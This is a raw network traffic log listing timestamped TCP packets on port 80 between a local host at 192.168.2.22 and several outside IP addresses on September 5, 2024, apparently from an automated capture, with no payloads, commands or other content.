Sep 5, 2024 09:05:36.777307034 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777322054 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777340889 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777357101 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777359009 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777368069 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777378082 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777389050 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777391911 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777401924 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777419090 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777435064 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777447939 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777460098 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777475119 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777483940 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777487040 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777499914 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777512074 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777595997 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777606964 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777616978 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777627945 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777640104 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777646065 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777651072 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777652979 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777662039 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777669907 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777678013 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777688026 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777689934 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777697086 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777714968 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777717113 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777721882 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777728081 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777740002 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777751923 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777755022 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777762890 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777781010 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777786970 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777817965 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777832985 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777844906 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777853966 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777865887 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777872086 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777879000 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777889967 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777901888 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777909040 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.777985096 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.777998924 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778008938 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778022051 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778033018 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778033972 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778039932 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778043985 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778053045 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778054953 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778067112 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778070927 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778076887 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778079987 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778089046 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778090954 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778095961 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778116941 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778124094 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778124094 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778141975 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778167963 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778183937 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778198957 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778213978 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778224945 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778234959 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778235912 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778248072 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778254032 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778260946 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778270960 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778280973 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778337955 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778350115 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778358936 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778369904 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778382063 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778388023 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778393030 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778395891 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778412104 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778423071 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778497934 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778507948 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778518915 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778531075 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778539896 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778549910 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778558016 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778558969 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778568983 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778588057 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778644085 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778654099 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778665066 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778676033 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778692961 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778703928 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778709888 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778719902 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778729916 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778743029 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778748035 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778753042 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778753996 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778770924 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778783083 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778902054 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778913021 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778923035 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778933048 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778944016 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778950930 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778954983 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778964043 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778969049 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778971910 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778980970 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.778983116 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.778994083 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779004097 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779010057 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779010057 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779015064 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779028893 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779031992 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779033899 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779046059 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779057026 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779068947 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779107094 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779131889 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779141903 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779153109 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779171944 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779181004 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779289007 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779299021 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779309034 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779320002 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779331923 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779340029 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779342890 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779345989 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779357910 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779365063 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779381037 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779390097 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779449940 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779460907 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779470921 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779483080 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779494047 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779498100 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779505968 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779506922 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779516935 CEST	80	49164	45.33.6.223	192.168.2.22
Sep 5, 2024 09:05:36.779525042 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779531002 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:36.779551029 CEST	49164	80	192.168.2.22	45.33.6.223
Sep 5, 2024 09:05:42.965926886 CEST	49165	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:42.970859051 CEST	80	49165	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:42.970935106 CEST	49165	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:42.982327938 CEST	49165	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:42.987262964 CEST	80	49165	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:42.987293959 CEST	80	49165	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:42.987457991 CEST	49165	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:42.992235899 CEST	80	49165	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:43.460738897 CEST	80	49165	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:43.460840940 CEST	49165	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:44.495448112 CEST	49165	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:44.509665012 CEST	80	49165	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:45.513046026 CEST	49166	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:45.517966986 CEST	80	49166	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:45.518063068 CEST	49166	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:45.532651901 CEST	49166	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:45.537508965 CEST	80	49166	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:45.537570000 CEST	49166	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:45.537602901 CEST	80	49166	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:45.542418003 CEST	80	49166	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:45.542428970 CEST	80	49166	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:46.005912066 CEST	80	49166	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:46.005980968 CEST	49166	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:47.038306952 CEST	49166	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:47.043195009 CEST	80	49166	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:48.055738926 CEST	49167	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:48.060694933 CEST	80	49167	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:48.060761929 CEST	49167	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:48.068279028 CEST	49167	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:48.073887110 CEST	80	49167	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:48.527137041 CEST	80	49167	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:48.527224064 CEST	80	49167	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:48.527465105 CEST	49167	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:48.530505896 CEST	49167	80	192.168.2.22	3.33.130.190
Sep 5, 2024 09:05:48.535306931 CEST	80	49167	3.33.130.190	192.168.2.22
Sep 5, 2024 09:05:53.860445023 CEST	49168	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:53.865276098 CEST	80	49168	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:53.865433931 CEST	49168	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:53.886950016 CEST	49168	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:53.891818047 CEST	80	49168	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:53.891920090 CEST	80	49168	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:53.892004013 CEST	49168	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:53.896936893 CEST	80	49168	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:54.336317062 CEST	80	49168	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:54.336332083 CEST	80	49168	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:54.336618900 CEST	49168	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:55.400027990 CEST	49168	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:56.431039095 CEST	49169	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:56.435894012 CEST	80	49169	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:56.435992002 CEST	49169	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:56.453758955 CEST	49169	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:56.458647013 CEST	80	49169	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:56.458735943 CEST	80	49169	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:56.458807945 CEST	49169	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:56.463593006 CEST	80	49169	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:56.463769913 CEST	80	49169	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:56.923188925 CEST	80	49169	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:56.923418045 CEST	49169	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:57.958224058 CEST	49169	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:57.963071108 CEST	80	49169	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:58.975538969 CEST	49170	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:58.980325937 CEST	80	49170	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:58.980381012 CEST	49170	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:58.986433029 CEST	49170	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:58.991254091 CEST	80	49170	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:59.458661079 CEST	80	49170	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:59.459084034 CEST	80	49170	172.191.244.62	192.168.2.22
Sep 5, 2024 09:05:59.459153891 CEST	49170	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:59.461838007 CEST	49170	80	192.168.2.22	172.191.244.62
Sep 5, 2024 09:05:59.466615915 CEST	80	49170	172.191.244.62	192.168.2.22
Sep 5, 2024 09:06:04.501104116 CEST	49171	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:04.506896019 CEST	80	49171	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:04.507009983 CEST	49171	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:04.529366970 CEST	49171	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:04.534194946 CEST	80	49171	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:04.534265995 CEST	49171	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:04.534287930 CEST	80	49171	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:04.542547941 CEST	80	49171	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:05.425697088 CEST	80	49171	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:05.425846100 CEST	80	49171	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:05.425909996 CEST	49171	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:06.040983915 CEST	49171	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:07.062216997 CEST	49172	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:07.067162991 CEST	80	49172	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:07.067235947 CEST	49172	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:07.083276987 CEST	49172	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:07.089926958 CEST	80	49172	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:07.089939117 CEST	80	49172	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:07.089987040 CEST	49172	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:07.094798088 CEST	80	49172	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:07.094940901 CEST	80	49172	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:07.984194994 CEST	80	49172	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:07.984474897 CEST	80	49172	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:07.984543085 CEST	49172	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:08.597424984 CEST	49172	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:09.614778996 CEST	49173	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:09.619645119 CEST	80	49173	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:09.619714975 CEST	49173	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:09.630803108 CEST	49173	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:09.635576963 CEST	80	49173	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:11.202347994 CEST	80	49173	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:11.202449083 CEST	80	49173	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:11.202498913 CEST	49173	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:11.202532053 CEST	80	49173	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:11.202559948 CEST	49173	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:11.203135967 CEST	80	49173	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:11.203180075 CEST	49173	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:11.203475952 CEST	80	49173	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:11.203517914 CEST	49173	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:11.277805090 CEST	49173	80	192.168.2.22	172.96.191.39
Sep 5, 2024 09:06:11.282641888 CEST	80	49173	172.96.191.39	192.168.2.22
Sep 5, 2024 09:06:16.323724031 CEST	49174	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:16.328541040 CEST	80	49174	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:16.329763889 CEST	49174	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:16.341559887 CEST	49174	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:16.346339941 CEST	80	49174	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:16.346437931 CEST	80	49174	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:16.346525908 CEST	49174	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:16.351353884 CEST	80	49174	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:16.931413889 CEST	80	49174	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:16.931438923 CEST	80	49174	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:16.931591988 CEST	49174	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:17.848299980 CEST	49174	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:18.865504026 CEST	49175	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:18.870408058 CEST	80	49175	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:18.873600960 CEST	49175	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:18.885534048 CEST	49175	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:18.890351057 CEST	80	49175	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:18.890500069 CEST	80	49175	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:18.890592098 CEST	49175	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:18.895395041 CEST	80	49175	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:18.895524025 CEST	80	49175	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:19.491352081 CEST	80	49175	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:19.491374016 CEST	80	49175	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:19.491440058 CEST	49175	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:20.391066074 CEST	49175	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:21.411154032 CEST	49176	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:21.416184902 CEST	80	49176	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:21.416243076 CEST	49176	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:21.429543972 CEST	49176	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:21.434298992 CEST	80	49176	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:22.024652004 CEST	80	49176	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:22.024669886 CEST	80	49176	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:22.024697065 CEST	80	49176	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:22.024820089 CEST	49176	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:22.027595997 CEST	49176	80	192.168.2.22	217.70.184.50
Sep 5, 2024 09:06:22.032555103 CEST	80	49176	217.70.184.50	192.168.2.22
Sep 5, 2024 09:06:27.193099976 CEST	49177	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:27.201992035 CEST	80	49177	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:27.202043056 CEST	49177	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:27.220551968 CEST	49177	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:27.227612972 CEST	80	49177	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:27.227649927 CEST	49177	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:27.229301929 CEST	80	49177	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:27.237792969 CEST	80	49177	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:27.800139904 CEST	80	49177	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:27.800152063 CEST	80	49177	63.250.47.40	192.168.2.22
Sep 5, 2024 09:06:27.800209999 CEST	49177	80	192.168.2.22	63.250.47.40
Sep 5, 2024 09:06:28.721491098 CEST	49177	80	192.168.2.22	63.250.47.40
